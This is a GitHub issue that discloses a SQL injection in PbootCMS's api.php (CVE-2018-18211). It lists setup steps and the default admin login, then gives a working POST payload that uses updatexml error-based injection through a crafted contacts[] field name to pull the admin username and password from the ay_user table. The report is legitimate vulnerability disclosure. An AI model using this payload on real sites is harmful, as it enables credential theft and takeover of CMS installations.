Pbootcms SQL injection in api.php #1
Comments
|
Github filtered **, if you have any questions, you can view the image exp |
|
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18211 has been assigned for this vulnerability. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql
Authorization code required after installation,We can go to this URL and enter our ip to get the authorization code.
URL:https://www.pbootcms.com/freeasn.html
This SQL injection requires background api functionality.
http://127.0.0.1/Pbootcms-master/admin.php
username=admin
password=123456
When the api function is enabled in the background, the foreground api will have SQL injection.
http://127.0.0.1/PbootCMS-V1.2.1/api.php/cms/addform?fcode=1
POST:contacts[content`) VALUES ( updatexml(1,concat(0x7e,(SELECT//distinct//concat(0x23,username,0x3a,password,0x23)//FROM//ay_user//limit//0,1),0x7e),1) );-- a] = 111 & mobile=13112344321 & content=123
We can get the admin account name and password
The text was updated successfully, but these errors were encountered: